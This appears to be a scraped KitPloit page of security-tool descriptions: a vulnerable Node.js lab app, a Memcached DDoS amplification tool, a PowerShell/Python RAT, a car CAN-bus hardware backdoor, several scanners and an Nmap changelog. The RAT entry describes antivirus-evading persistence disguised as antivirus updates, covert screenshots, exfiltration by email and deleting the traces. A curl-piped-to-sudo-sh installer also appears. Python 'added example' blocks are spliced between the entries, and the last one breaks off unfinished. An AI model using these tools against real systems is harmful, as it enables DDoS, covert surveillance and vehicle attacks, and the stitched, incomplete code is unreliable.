Channel: KitPloit - PenTest Tools!

XVNA - Extreme Vulnerable Node Application


XVNA is an extreme vulnerable node application coded in Node.js (Express.js)/MongoDB that helps security enthusiasts learn application security. It is not advisable to host this application online, as it is intended to be vulnerable. We suggest hosting it in a local environment and sharpening your application security skills with any tools of your own choice. It is completely legal to break into or hack it. The idea is to evangelise application security to the community in the simplest and most fundamental way. Learn and acquire these skills for good purposes; how you use these skills and content is not our responsibility.

Warning
Extreme Vulnerable Node Application (XVNA) is highly vulnerable; don't upload it to your hosting provider's public folder or any internet-facing server, as it will be compromised. It is recommended to use localhost.

Disclaimer
We are not responsible for any loss after using XVNA (Extreme Vulnerable Node Application). To be clear, this is a deliberately vulnerable application, and we are not responsible for any loss of yours. Installing it on a web server may compromise your security and data.

Setup
  • Start MongoDB
  • Create a DB named xvna in MongoDB
  • Import the collections from the collection folder into MongoDB
  • Start XVNA from the root folder using the command: node index.js
  • We are good to go; hit localhost:3000/app
  • Login credentials: email -> admin@xvna.com, password -> password

List of Vulnerabilities
  • A1:2017-Injection
    1. OS Injection
    2. NoSQL Injection
    3. Server-side JS Injection
  • A2:2017-Broken Authentication
  • A3:2017-Sensitive Data Exposure
    1. Sensitive Data
    2. Headers
  • A6:2017-Security Misconfiguration
  • A7:2017-Cross Site Scripting
  • A8:2017-Insecure Deserialization

More https://www.vegabird.com/category/extreme-vulnerable-node-application/



Memcrashed-DDoS-Exploit - DDoS Attack Tool For Sending Forged UDP Packets To Vulnerable Memcached Servers Obtained Using Shodan API


This tool allows you to send forged UDP packets to Memcached servers obtained from Shodan.io

Prerequisites
The only thing you need installed is Python 3.x:
apt-get install python3
You also need the Scapy and Shodan modules installed:
pip install scapy
pip install shodan

Using Shodan API
This tool requires you to have an upgraded Shodan API key.
You may obtain one for free from Shodan if you sign up using a .edu email.




Using Docker

You may deploy this tool to the cloud using a light Alpine Docker image.
Note: Make sure to explicitly enter 'y' or 'n' to the interactive prompt
git clone https://github.com/649/Memcrashed-DDoS-Exploit.git
cd Memcrashed-DDoS-Exploit
echo "SHODAN_KEY" > api.txt
docker build -t memcrashed .
docker run -it memcrashed


Firefox Tunnel - The Way To Use Firefox To Make A Tunnel To Remote Communication

Powershell-RAT - Python Based Backdoor That Uses Gmail To Exfiltrate Data Through Attachment

Python based backdoor that uses Gmail to exfiltrate data as an e-mail attachment.
This RAT will help someone during red team engagements to backdoor a Windows machine. It tracks user activity using screen capture and sends the information to the attacker as an e-mail attachment.

Note: This piece of code is Fully UnDetectable (FUD) by Anti-Virus (AV) software.
This project must not be used for illegal purposes or for hacking into system where you do not have permission, it is strictly for educational purposes and for people to experiment with.
Any suggestions or ideas for this tool are welcome - just tweet me on @ManiarViral

Screenshots
On the first run of Powershell-RAT the user will get the options below:


Using Hail Mary option to backdoor a Windows machine:


Successfully taking screenshots of the user activity:


Data exfiltrated as an email attachment using Gmail:


My Windows machine does not have Python installed, what should I do?
  • Compile PowershellRAT.py into an executable using PyInstaller
  • PyInstaller is available on PyPI. You can install it through pip:
pip install pyinstaller

Setup
  • Throwaway Gmail email address
  • Enable "Allow less secure apps" by going to https://myaccount.google.com/lesssecureapps
  • Modify the $username & $password variables for your account in the Mail.ps1 PowerShell file
  • Modify $msg.From & $msg.To.Add with the throwaway Gmail address

How do I use this?
  • Press 1: This option sets the execution policy to unrestricted using Set-ExecutionPolicy Unrestricted. This is useful on an administrator machine
  • Press 2: This takes a screenshot of the current screen on the user machine using the Shoot.ps1 PowerShell script
  • Press 3: This option backdoors the user machine using schtasks and sets the task name to MicrosoftAntiVirusCriticalUpdatesCore
  • Press 4: This option sends an email from the user machine using PowerShell. It uses the Mail.ps1 file to send the screenshot as an attachment to exfiltrate data
  • Press 5: This option backdoors the user machine using schtasks and sets the task name to MicrosoftAntiVirusCriticalUpdatesUA
  • Press 6: This option deletes the screenshots from the user machine to remain stealthy
  • Press 7: This option backdoors the user machine using schtasks and sets the task name to MicrosoftAntiVirusCriticalUpdatesDF
  • Press 8: This option performs all of the above with a single press of 8 on the keyboard. The attacker will receive an email every 5 minutes with screenshots as an email attachment. Screenshots will be deleted after 12 minutes
  • Press 9: Exit gracefully from the program, or press Control+C

Questions?
Twitter: https://twitter.com/maniarviral LinkedIn: https://au.linkedin.com/in/viralmaniar

    DefenseMatrix - Full security solution for Linux Servers


    Full security solution for Linux Servers.

    SCUTUM is to be added to the DefenseMatrix project
    After consideration, SCUTUM, as a nice firewall controller, is to be added to DefenseMatrix. It will soon replace the iptables controller and arptables controller in DefenseMatrix. Expect lots of improvements.

    What is DefenseMatrix?
    DefenseMatrix helps individuals and organizations who use Linux to secure their servers on various dimensions automatically. It makes securing a Linux server faster and easier.
    Never before has a program had so many security features packed into one. Therefore we provide you with this all-in-one solution that will make the following difficult things easier to handle.

    Why do we need to secure Linux?
    Did you know that an ordinary server receives almost 6000 attacks per day? With our help, these attacks don't come in.

    DefenseMatrix features:
    • iptables tcp/udp/icmp firewall
    • arptables ARP firewall
    • Rootkit Detection
    • Password complexity check
    • Attack analysis and visualization
    We configure these things automatically for you.

    Installation
    We make it fast, easy, and simple
    $ sudo sh -c "$(curl -fsSL https://raw.githubusercontent.com/K4YT3X/DefenseMatrix/master/quickinstall.sh)"

    Uninstallation
    We still make it easy for you
    $ sudo DefenseMatrix --uninstall

    Usage
    This is how you get started with DefenseMatrix
    $ sudo DefenseMatrix                  # Print Help Page
    $ sudo service DefenseMatrix start # Start DefenseMatrix service
    $ sudo service DefenseMatrix stop # Stop DefenseMatrix service


    Th3Inspector - Tool for Information Gathering

    Tool For Information Gathering.

    Usage
    Short Form   Long Form       Description
    -i           --info          Website Information
    -n           --number        Phone Number Information
    -mx          --mailserver    Find IP Address And E-mail Server
    -w           --whois         Domain Whois Lookup
    -l           --location      Find Website/IP Address Location
    -c           --cloudflare    Bypass CloudFlare
    -a           --age           Domain Age Checker
    -ua          --useragent     User Agent Info
    -p           --port          Check Active Services On Resource
    -b           --bin           Credit Card Bin Checker
    -s           --subdomain     Subdomain Scanner
    -e           --email         E-mail Address Checker
    -cms         --cms           Content Management System Checker
    -h           --help          Show the help message and exit

    Examples
    • To list all the basic options and switches, use the -h switch:
    perl Th3inspector.pl -h
    • To get website information:
    perl Th3inspector.pl -i example.com
    • To get phone number information:
    perl Th3inspector.pl -n xxxxxxx
    • To find the IP address and e-mail server:
    perl Th3inspector.pl -mx example.com
    • To find a website or IP address location:
    perl Th3inspector.pl -l example.com
    • To get the real IP of a website using CloudFlare protection:
    perl Th3inspector.pl -c example.com


    Screenshots






    Video

    Installation Linux
    git clone https://github.com/Moham3dRiahi/Th3inspector.git
    cd Th3inspector
    chmod +x install.sh && ./install.sh

    Installation Android
    Download Termux
    git clone https://github.com/Moham3dRiahi/Th3inspector.git
    cd Th3inspector
    chmod +x install.sh && ./install.sh

    Installation Windows
    Download Perl
    Download Th3inspector
    cpan install JSON
    Extract Th3inspector into Desktop
    Open CMD and type the following commands:
    cd Desktop/Th3inspector-master/
    perl Th3inspector.pl

    Version
    Current version is 1.9
    What's New
    • Speed-up
    • Bug fixes


    CBM - Car Backdoor Maker

    A hardware-backdoor for CAN bus - by @UnaPibaGeek & @holesec
    For the first time, a hardware backdoor tool is presented having several advanced features, such as: remote control via SMS commands, automated launch of attack payloads at a GPS location or when a specific car status is reached; and a configuration interface that allows users to create attack payloads in an easy manner. Have you ever imagined the possibility of your car being automatically attacked based on its GPS coordinates, its current speed or any other set of parameters? Now it's possible :-)
    The project is divided into two parts: the "Car Backdoor Maker" (PC software) and "The Bicho" (hardware-backdoor for CAN bus).

    Car Backdoor Maker
    The "car backdoor maker" is PC software that allows payload customization for use with the hardware-backdoor. It has an intuitive graphical interface:


    Under "car backdoor maker" folder, you'll find the source code to compile it using Qt C++ 5.6.

    The Bicho
    The Bicho is a hardware-backdoor that must be connected to the car's OBD-II port. It supports multiple attack payloads (pre-configured using Car Backdoor Maker) and it can be used against any vehicle that supports CAN, without limitations regarding manufacturer or model. Each one of the payloads is associated with a command that can be delivered via SMS, allowing remote execution from any geographical point. Furthermore, as an advanced feature, the attack payload can be configured to be automatically executed once the victim's vehicle is near a given GPS location. The execution can also be triggered by detecting the transmission of a particular CAN frame, which can be associated with the speed of the vehicle, its fuel level, and some other factors, providing the means to design highly sophisticated attacks and execute them remotely.


    Under "hardware-schematics" and "firmware" folders you'll find all you need to build our hardware-backdoor in your own lab.


    StaCoAn - Crossplatform tool which aids developers, bugbounty hunters and ethical hackers performing static code analysis on mobile applications


    StaCoAn is a crossplatform tool which aids developers, bugbounty hunters and ethical hackers performing static code analysis on mobile applications*.
    This tool will look for interesting lines in the code which can contain:
    • Hardcoded credentials
    • API keys
    • URLs of APIs
    • Decryption keys
    • Major coding mistakes
    This tool was created with a big focus on usability and graphical guidance in the user interface.
    For the impatient ones, grab the download on the releases page.
    *: note that currently only apk files are supported, but ipa files will follow very shortly.
    An example report can be found here: example report

    Features
    The concept is that you drag and drop your mobile application file (an .apk or .ipa file) on the StaCoAn application and it will generate a visual and portable report for you. You can tweak the settings and wordlists to get a customized experience.
    The reports contain a handy tree viewer so you can easily browse through your decompiled application.


    Looting concept
    The Loot function lets you 'loot' (~bookmark) the findings which are of value to you, and on the loot page you get an overview of your 'loot' raid.
    The final report can be exported to a zip file and shared with other people.

    Wordlists
    The application uses wordlists for finding interesting lines in the code. Wordlists are in the following format:
    API_KEY|||80||| This contains an API key reference
    (https|http):\/\/.*api.*|||60||| This regex matches any URL containing 'api'
    Note that these wordlists also support regex entries.
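    As an added example (not StaCoAn's own code), a parser for the wordlist format shown above and a scan over constructed decompiled-source lines, ranking hits by score. The comment-line handling and the extra sample entries are our assumptions, not part of the documented format.

```python
import re
from dataclasses import dataclass
from typing import List, Tuple

# Constructed wordlist in the documented format: pattern|||score|||description.
# Every pattern is compiled as a regular expression (the page notes regex support).
SAMPLE_WORDLIST = r"""
API_KEY|||80||| This contains an API key reference
(https|http):\/\/.*api.*|||60||| This regex matches any URL containing 'api'
password\s*=|||70||| Possible hardcoded password assignment
# Comment lines are skipped (our assumption; the page does not define comments)
"""

# Constructed lines standing in for an .apk's decompiled Java output.
SAMPLE_SOURCE = [
    'public static final String API_KEY = "AIzaConstructedExample";',
    'private static final String BASE = "https://api.example.test/v2/";',
    'String password = "hunter2"; // constructed test line',
    'Log.d(TAG, "nothing interesting here");',
]


@dataclass
class Rule:
    pattern: re.Pattern
    score: int
    description: str


def parse_wordlist(text: str) -> List[Rule]:
    """Parse 'pattern|||score|||description' lines into compiled rules.

    Malformed lines (wrong field count, bad regex, non-numeric score) are skipped
    rather than aborting, so one bad entry in a user-edited wordlist does not
    hide every other finding.
    """
    rules: List[Rule] = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split("|||")
        if len(parts) != 3:
            continue
        pattern, score, description = (p.strip() for p in parts)
        try:
            rules.append(Rule(re.compile(pattern), int(score), description))
        except (re.error, ValueError):
            continue
    return rules


def scan_lines(lines: List[str], rules: List[Rule]) -> List[Tuple[int, int, str, str]]:
    """Return (line_no, score, description, line) for each rule hit, highest
    score first so the most sensitive findings surface at the top of a report."""
    hits = []
    for line_no, line in enumerate(lines, start=1):
        for rule in rules:
            if rule.pattern.search(line):
                hits.append((line_no, rule.score, rule.description, line))
    hits.sort(key=lambda h: (-h[1], h[0]))
    return hits


if __name__ == "__main__":
    for line_no, score, desc, line in scan_lines(SAMPLE_SOURCE, parse_wordlist(SAMPLE_WORDLIST)):
        print(f"line {line_no} [{score}] {desc}: {line}")
```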

    Filetypes
    Any source file will be processed. This includes '.java', '.js', '.html', '.xml', ... files.
    Database-files are also searched for keywords. The database also has a table viewer.



    Responsive Design
    The reports are made to fit on all screens.


    Limitations
    This tool will have trouble with obfuscated code. If you are a developer try to compile without obfuscation turned on before running this tool. If you are on the offensive side, good luck bro.

    Getting Started
    If you want to get started as soon as possible, head over to the releases page and download the executable or archive which corresponds to your operating system.
    If you have downloaded the release zip file, extract this. Copy the .apk or .ipa file to the extracted folder.
    Drag and drop this file onto the executable. The report will now be generated in the report folder.

    From source
    git clone https://github.com/vincentcox/StaCoAn/
    cd StaCoAn/src

    Make sure that you have pip3 installed:
    sudo apt-get install python3-pip

    Install the required python packages:
    pip3 install -r requirements.txt

    Run StaCoAn:
    python3 stacoan.py yourApp.apk

    Building the executable
    pip3 install pyinstaller

    Windows
    pyinstaller main.py --onefile --icon icon.ico --name stacoan --clean

    mac
    pyinstaller main.py --onefile --icon icon.ico --name stacoan --clean

    Linux
    python3 -m PyInstaller main.py --onefile --icon icon.ico --name stacoan --clean

    Running the Docker container
    cd docker
    docker build . -t stacoan
    docker run -e JAVA_OPTS="-Xms2048m -Xmx2048m" -p 8000:8000 -v /yourappsfolder:/tmp -i -t stacoan /tmp/com.myapk.apk
    Wait for it to be analysed and then open your browser at http://localhost:8000



    Taipan - Web Application Security Scanner

    Taipan is an automated web application scanner which identifies web vulnerabilities automatically. This project is the core engine of a broader project which includes other components, like a web dashboard where you can manage your scans or download a PDF report, and a scanner agent to run on a specific host. Below are some screenshots of the Taipan dashboard:







    If you are interested in trying the full product, you can contact: aparata[AT]gmail.com
    Download

    Using Taipan
    Taipan can run on both Windows (natively) and Linux (with mono). To run it in Linux you have to install mono in version >= 4.8.0. You can track the implementation of the new features in the related Kanban board.

    Scan Profile
    Taipan scans the given web site according to the profile you specify. Each profile enables or disables specific scan features; to show all the available profiles, run Taipan with the --show-profiles option.

    Scan/Stop/Pause a scan
    During a scan you can interact with it by pausing or stopping it if necessary. To do so, press:
    • P: pause the scan
    • S: stop the scan
    • R: resume a paused scan
    The state change is not immediate; you have to wait until all threads have reached the desired state.

    Launch a scan
    To launch a new scan you have to provide the URL and the profile to use. It is not necessary to specify the full profile name; a prefix is enough. Below is an example of execution:


    Taipan Components
    Taipan is composed of four main components:
    • Web Application fingerprinter: inspects the given application to identify whether it is a COTS application and, if so, extracts the identified version.
    • Hidden Resource Discovery: scans the application to identify resources that are not directly navigable or that shouldn't be accessible, like secret pages or test pages.
    • Crawler: navigates the web site to provide the other components with a list of pages to analyze. It can mutate requests in order to find less common paths.
    • Vulnerability Scanner: probes the web application and tries to identify possible vulnerabilities. It is composed of various AddOns so its Knowledge Base can be expanded easily.

    GetAltName - Get Subject Alt Name From SSL Certificates


    GetAltName is a little script that extracts Subject Alt Names from SSL certificates directly from HTTPS web sites, which can provide you with DNS names or virtual servers.
    It's useful in the discovery phase of a pen-testing assessment: this tool can provide you with more information about your target and scope.
    This code is in alpha stage and has been rewritten from Ruby to Python; it doesn't do as much as it should. Lots of things and features are missing, but it delivers, so treat it as quick-and-dirty code. More features are incoming, and you're welcome to contribute if you want.
    You can read more about how this tool works from my post in getroot.info (in Spanish).
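    An added example, not the getaltname script's own code, of the extraction step the description refers to: locate the subjectAltName extension inside a DER certificate and pull out its dNSName entries. The walker works on any DER or PEM certificate, but here it runs on a constructed certificate-like byte structure so that it needs no network; on a live run the PEM from ssl.get_server_certificate((host, 443)) would be passed to dns_names_from_pem.

```python
import ssl
from typing import List, Optional, Tuple

SAN_OID = bytes.fromhex("551d11")  # 2.5.29.17 id-ce-subjectAltName
TAG_SEQUENCE, TAG_OID, TAG_OCTET_STRING, TAG_BOOLEAN = 0x30, 0x06, 0x04, 0x01
TAG_DNSNAME = 0x82  # GeneralName [2] IMPLICIT IA5String


def read_tlv(buf: bytes, pos: int) -> Tuple[int, bytes, int]:
    """Decode one DER tag-length-value starting at pos; return (tag, value, next_pos)."""
    if pos + 2 > len(buf):
        raise ValueError("truncated DER element")
    tag, length, pos = buf[pos], buf[pos + 1], pos + 2
    if length & 0x80:  # long form: low 7 bits give the count of length octets
        n = length & 0x7F
        if n == 0 or n > 4 or pos + n > len(buf):
            raise ValueError("unsupported or truncated DER length")
        length, pos = int.from_bytes(buf[pos:pos + n], "big"), pos + n
    if pos + length > len(buf):
        raise ValueError("DER length runs past end of buffer")
    return tag, buf[pos:pos + length], pos + length


def parse_general_names(value: bytes) -> List[str]:
    """Return the dNSName entries of a GeneralNames SEQUENCE; other name forms
    (iPAddress, rfc822Name, URI) are skipped since the tool wants host names."""
    tag, seq, _ = read_tlv(value, 0)
    if tag != TAG_SEQUENCE:
        raise ValueError("subjectAltName value is not a SEQUENCE")
    names, pos = [], 0
    while pos < len(seq):
        tag, item, pos = read_tlv(seq, pos)
        if tag == TAG_DNSNAME:
            names.append(item.decode("ascii"))
    return names


def find_san_extension(buf: bytes) -> Optional[bytes]:
    """Depth-first walk of the DER tree until an Extension SEQUENCE whose OID is
    id-ce-subjectAltName is found; returns that extension's OCTET STRING payload."""
    pos = 0
    while pos < len(buf):
        tag, value, pos = read_tlv(buf, pos)
        if not (tag & 0x20) or not value:
            continue  # primitive or empty element: nothing to descend into
        inner_tag, inner_val, inner_pos = read_tlv(value, 0)
        if tag == TAG_SEQUENCE and inner_tag == TAG_OID and inner_val == SAN_OID:
            ext_tag, ext_val, inner_pos = read_tlv(value, inner_pos)
            if ext_tag == TAG_BOOLEAN:  # optional 'critical' flag precedes the value
                ext_tag, ext_val, inner_pos = read_tlv(value, inner_pos)
            if ext_tag == TAG_OCTET_STRING:
                return ext_val
        found = find_san_extension(value)
        if found is not None:
            return found
    return None


def dns_names_from_der(der: bytes) -> List[str]:
    ext = find_san_extension(der)
    return parse_general_names(ext) if ext is not None else []


def dns_names_from_pem(pem: str) -> List[str]:
    """PEM as returned by ssl.get_server_certificate((host, port)) on a live run."""
    return dns_names_from_der(ssl.PEM_cert_to_DER_cert(pem))


def _der(tag: int, payload: bytes) -> bytes:
    """Short-form DER encoder used only to build the constructed sample below."""
    if len(payload) >= 128:
        raise ValueError("sample helper supports short-form lengths only")
    return bytes([tag, len(payload)]) + payload


# Constructed certificate-like structure (not a real certificate): only the
# nesting the walker cares about, Extensions inside the [3] EXPLICIT wrapper.
_GENERAL_NAMES = _der(TAG_SEQUENCE,
                      _der(TAG_DNSNAME, b"example.com")
                      + _der(TAG_DNSNAME, b"www.example.com")
                      + _der(0x87, bytes([10, 0, 0, 1])))  # iPAddress, skipped
_SAN_EXT = _der(TAG_SEQUENCE, _der(TAG_OID, SAN_OID) + _der(TAG_OCTET_STRING, _GENERAL_NAMES))
_KEY_USAGE_EXT = _der(TAG_SEQUENCE, _der(TAG_OID, bytes.fromhex("551d0f"))
                      + _der(TAG_BOOLEAN, b"\xff")
                      + _der(TAG_OCTET_STRING, _der(0x03, b"\x05\xa0")))
SAMPLE_CERT_DER = _der(TAG_SEQUENCE, _der(TAG_SEQUENCE, _der(0xA3, _der(TAG_SEQUENCE, _KEY_USAGE_EXT + _SAN_EXT))))
SAMPLE_CERT_PEM = ssl.DER_cert_to_PEM_cert(SAMPLE_CERT_DER)

if __name__ == "__main__":
    print(dns_names_from_der(SAMPLE_CERT_DER))  # ['example.com', 'www.example.com']
```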

    Usage:
    usage: getaltname.py [-h] [-p PORT] [-s [timeout]] [-m] [-o OUTPUT] [-c {l,s}]
    [-d]
    hostname

    positional arguments:
    hostname Host to analyze.

    optional arguments:
    -h, --help show this help message and exit
    -p PORT, --port PORT Destiny port (default 443)
    -s [timeout], --search-crt [timeout] Retrieve subdomains found in crt.sh
    -m, --matching-domain Show matching domain name only
    -o OUTPUT, --output OUTPUT Set output filename
    -c {l,s}, --clipboard {l,s} Copy the output to the clipboard as a
    List or a Single string
    -d, --debug Set debug enable
    You can output to a text file and also copy the output to your clipboard as a list or a single-line string, which is useful if you're trying to make a quick scan with Nmap or other tools.

    Installation
    Required libraries:
    • colorama
    • ndg-httpsclient
    • pyperclip
    • requests
    • tldextract
    Installation with pipenv:
    $ git clone https://github.com/franccesco/getaltname.git
    $ pipenv install
    Installation with Pip:
    $ git clone https://github.com/franccesco/getaltname.git
    $ pip install -r requirements.txt
    For the copy & paste mechanism you will have to install the xclip package. Debian/Ubuntu/Mint:
    $ apt install xclip

    TO-DO
    • File output
    • Output to clipboard
    • Clean sub-domains wildcards
    • Remove duplicates
    • A filter system for main domain and TLDs.
    • Add colors (so l33t. /s)
    • Get additional sub-domains from crt.sh

    Converto - Installing Kali Linux On VPS Server

    Installing Kali Linux On VPS Server.

    Steps For Installing :-
    1. sudo apt-get update
    2. sudo apt-get install git
    3. git clone https://github.com/developerkunal/Converto.git
    4. cd Converto
    5. chmod +x converto.sh
    6. ./converto.sh
    7. Type 1 for install, type 2 for exit.
    8. Press 1 and Enter.
    9. Now choose the desired option.
    10. Press Y.
    11. Now select Yes.
    12. Now select "install the package maintainer's version" and press Enter.
    13. Now again select "install the package maintainer's version" and press Enter.
    14. Now choose the appropriate metapackages you want to install:
        1. Kali Linux base system
        2. Kali Linux - all packages
        3. Kali Linux forensic tools
        4. Kali Linux complete system
        5. Kali Linux GPU tools
        6. Kali Linux Nethunter tools
        7. Kali Linux password cracking tools
        8. Kali Linux RFID tools
        9. Kali Linux SDR tools
        10. Kali Linux Top 10 tools
        11. Kali Linux VoIP tools
        12. Kali Linux webapp assessment tools
        13. Kali Linux wireless tools
        Select option 2 (Kali Linux - all packages install) (Recommended).
    15. Select the language for the layout matching the keyboard (I am selecting English).
    16. Select No.
    17. Select Yes.
    18. Press the Right Arrow key, and press Enter.
    19. Select Yes.
    20. Press Enter if you do not want to add any users.
    21. Select From inetd.
    22. Press Enter.

    Now Kali Linux is successfully installed.

    Optional Step for installing VNC.


    Steps :-
    1. Choose the VNC type you want to install (Graphical VNC recommended).
    2. Now enter the password for the VNC connection and re-enter it for verification.
    3. Optional: press Y if you want a view-only password (someone holding the view-only password will only be able to view the screen).

    Commands to Start and Stop The VNC Server

    To start a VNC server
    root@kali:~# vncserver
    (It always starts on :1)

    To stop a VNC Server
    root@kali:~# vncserver -kill :1
    Example IP in VNC Viewer : 127.0.0.1:1


    S3Scanner - Scan For Open S3 Buckets And Dump


    A quick and dirty script to find unsecured S3 buckets and dump their contents.

    Using
    The tool has 2 parts:

    1 - s3finder.py
    This script takes a list of domain names and checks if they're hosted on Amazon S3. Found S3 domains are written to a file with their corresponding region in the format "domain:region".

    • Install:
      1. (Optional) virtualenv venv && source ./venv/bin/activate
      2. pip install -r requirements.txt
    • Usage: $> python s3finder.py -o output.txt domainsToCheck.txt
    Compatibility: Tested with Python 2.7 & 3.6

    2 - s3dumper.sh
    This script takes in a list of domains with regions made by s3finder.py. For each domain, it checks if there are publicly readable buckets and dumps them if so.
    Usage: $> s3dumper.sh output.txt
    Requirements: aws-cli


    WPHunter - Wordpress Vulnerability Scanner


    You can use this tool on your WordPress website to check its security by finding the vulnerabilities in it.
    Over 75 million websites run on WordPress, which now powers 26% of the Web. Remarkably, thousands of WP sites are vulnerable to attacks and get hacked each day. You can lose all your data, it can cost thousands of dollars, or worse, attackers might use your WordPress to target your visitors. Bots scan the web automatically for weak websites and hack into them within seconds. If your WordPress is vulnerable, it will be only a matter of time before you run into trouble. That's why you should get started as soon as possible and check if your WordPress is prone to attack.

    [+] Auto Cms Detect
    [1] WordPress :
    The tool detects the WordPress version and tries to find the vulnerabilities affecting that version; it also detects the plugins and themes installed on the website.
    WPHunter can also find backup files and path disclosure, and checks security headers.

    Usage
    Short Form   Long Form   Description
    -h           --help      Usage of the tool

    Example
    If you have a list of websites, run the tool with this command line:
    If you don't have a list of websites, run the tool with this command:
    php wphunter.php https://www.example.com

    Installation Linux
    git clone https://github.com/Jamalc0m/wphunter/wphunter.git
    cd WPHunter
    php wphunter.php

    Installation Windows
    Download  and install PHP
    Download WPHunter
    Extract WPHunter into Desktop
    Open CMD and type the following commands:
    cd Desktop/wphunter-master/
    php wphunter.php

    Version
    Current version is 0.1 Beta
    Upcoming features:
    Scan for plugin and theme vulnerabilities, generate reports (PDF, HTML), password brute force.


    Nmap 7.70 - Free Security Scanner: Better service and OS detection, 9 new NSE scripts, new Npcap, and much more


    Nmap ("Network Mapper") is a free and open source utility for network discovery and security auditing. Many systems and network administrators also find it useful for tasks such as network inventory, managing service upgrade schedules, and monitoring host or service uptime. Nmap uses raw IP packets in novel ways to determine what hosts are available on the network, what services (application name and version) those hosts are offering, what operating systems (and OS versions) they are running, what type of packet filters/firewalls are in use, and dozens of other characteristics. It was designed to rapidly scan large networks, but works fine against single hosts. Nmap runs on all major computer operating systems, and official binary packages are available for Linux, Windows, and Mac OS X. In addition to the classic command-line Nmap executable, the Nmap suite includes an advanced GUI and results viewer (Zenmap), a flexible data transfer, redirection, and debugging tool (Ncat), a utility for comparing scan results (Ndiff), and a packet generation and response analysis tool (Nping).

    Nmap was named “Security Product of the Year” by Linux Journal, Info World, LinuxQuestions.Org, and Codetalker Digest. It was even featured in twelve movies, including The Matrix Reloaded, Die Hard 4, Girl With the Dragon Tattoo, and The Bourne Ultimatum.

    Features
    • Flexible: Supports dozens of advanced techniques for mapping out networks filled with IP filters, firewalls, routers, and other obstacles. This includes many port scanning mechanisms (both TCP & UDP), OS detection, version detection, ping sweeps, and more. See the documentation page.
    • Powerful: Nmap has been used to scan huge networks of literally hundreds of thousands of machines.
    • Portable: Most operating systems are supported, including Linux, Microsoft Windows, FreeBSD, OpenBSD, Solaris, IRIX, Mac OS X, HP-UX, NetBSD, Sun OS, Amiga, and more.
    • Easy: While Nmap offers a rich set of advanced features for power users, you can start out as simply as "nmap -v -A targethost". Both traditional command line and graphical (GUI) versions are available to suit your preference. Binaries are available for those who do not wish to compile Nmap from source.
    • Free: The primary goals of the Nmap Project are to help make the Internet a little more secure and to provide administrators/auditors/hackers with an advanced tool for exploring their networks. Nmap is available for free download, and also comes with full source code that you may modify and redistribute under the terms of the license.
    • Well Documented: Significant effort has been put into comprehensive and up-to-date man pages, whitepapers, tutorials, and even a whole book! Find them in multiple languages here.
    • Supported: While Nmap comes with no warranty, it is well supported by a vibrant community of developers and users. Most of this interaction occurs on the Nmap mailing lists. Most bug reports and questions should be sent to the nmap-dev list, but only after you read the guidelines. We recommend that all users subscribe to the low-traffic nmap-hackers announcement list. You can also find Nmap on Facebook and Twitter. For real-time chat, join the #nmap channel on Freenode or EFNet.
    • Acclaimed: Nmap has won numerous awards, including "Information Security Product of the Year" by Linux Journal, Info World and Codetalker Digest. It has been featured in hundreds of magazine articles, several movies, dozens of books, and one comic book series. Visit the press page for further details.
    • Popular: Thousands of people download Nmap every day, and it is included with many operating systems (Redhat Linux, Debian Linux, Gentoo, FreeBSD, OpenBSD, etc). It is among the top ten (out of 30,000) programs at the Freshmeat.Net repository. This is important because it lends Nmap its vibrant development and user support communities.

    Changelog

    Here is the full list of significant changes:

    • [Windows] We made a ton of improvements to our Npcap Windows packet
    capturing library (https://nmap.org/npcap/) for greater performance and
    stability, as well as smoother installer and better 802.11 raw frame
    capturing support. Nmap 7.70 updates the bundled Npcap from version 0.93 to
    0.99-r2, including all these changes from the last seven Npcap releases:
    https://nmap.org/npcap/changelog

    • Integrated all of your service/version detection fingerprints submitted
    from March 2017 to August 2017 (728 of them). The signature count went up
    1.02% to 11,672, including 26 new softmatches. We now detect 1224
    protocols from filenet-pch, lscp, and netassistant to sharp-remote,
    urbackup, and watchguard. We will try to integrate the remaining
    submissions in the next release.

    • Integrated all of your IPv4 OS fingerprint submissions from September
    2016 to August 2017 (667 of them). Added 298 fingerprints, bringing the new
    total to 5,652. Additions include iOS 11, macOS Sierra, Linux 4.14, Android
    7, and more.

    • Integrated all 33 of your IPv6 OS fingerprint submissions from September
    2016 to August 2017. New groups for OpenBSD 6.0 and FreeBSD 11.0 were
    added, as well as strengthened groups for Linux and OS X.

    • Added the --resolve-all option to resolve and scan all IP addresses of a
    host. This essentially replaces the resolveall NSE script. [Daniel Miller]

    • [NSE][SECURITY] Nmap developer nnposter found a security flaw (directory
    traversal vulnerability) in the way the non-default http-fetch script
    sanitized URLs. If a user manually ran this NSE script against a malicious
    web server, the server could potentially (depending on NSE arguments used)
    cause files to be saved outside the intended destination directory.
    Existing files couldn't be overwritten. We fixed http-fetch, audited our
    other scripts to ensure they didn't make this mistake, and updated the
    httpspider library API to protect against this by default. [nnposter,
    Daniel Miller]
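    The class of defence the http-fetch fix describes, written here as an added Python example rather than Nmap's Lua code: the save path is derived from the URL, normalised, checked to stay under the destination directory, and existing files are never overwritten. The function names and sample URLs are constructed for illustration.

```python
import os
import posixpath
from urllib.parse import unquote, urlsplit


class UnsafeDestination(Exception):
    """Raised when a server-supplied URL would map to a file outside the save directory."""


def safe_save_path(base_dir: str, url: str) -> str:
    """Map a fetched URL to an absolute file path strictly inside base_dir.

    The URL path is attacker-controlled (the server chooses what it links to),
    so it is percent-decoded, normalised and then checked against the resolved
    base directory before it is trusted.
    """
    base = os.path.realpath(base_dir)
    # Only the path component becomes a file name; query and fragment are dropped.
    url_path = unquote(urlsplit(url).path)
    is_dir = url_path == "" or url_path.endswith("/")
    # posixpath keeps URL semantics regardless of the local separator; leading
    # '..' segments survive normpath and are caught by the containment check below.
    rel = posixpath.normpath(url_path.lstrip("/"))
    if rel == ".":
        rel = ""
    if is_dir:
        rel = posixpath.join(rel, "index.html")
    # NUL bytes and backslashes are rejected outright: some filesystems and
    # libraries treat them as terminators or separators.
    if "\x00" in rel or "\\" in rel:
        raise UnsafeDestination(f"illegal characters in path of {url!r}")
    target = os.path.realpath(os.path.join(base, *rel.split("/")))
    if os.path.commonpath([base, target]) != base or target == base:
        raise UnsafeDestination(f"{url!r} resolves outside {base_dir!r}")
    return target


def is_safe(base_dir: str, url: str) -> bool:
    """Predicate form, convenient for filtering a crawl's links before saving."""
    try:
        safe_save_path(base_dir, url)
        return True
    except UnsafeDestination:
        return False


def save_fetched(base_dir: str, url: str, body: bytes) -> str:
    """Write body to the checked path; an existing file is never overwritten."""
    target = safe_save_path(base_dir, url)
    os.makedirs(os.path.dirname(target), exist_ok=True)
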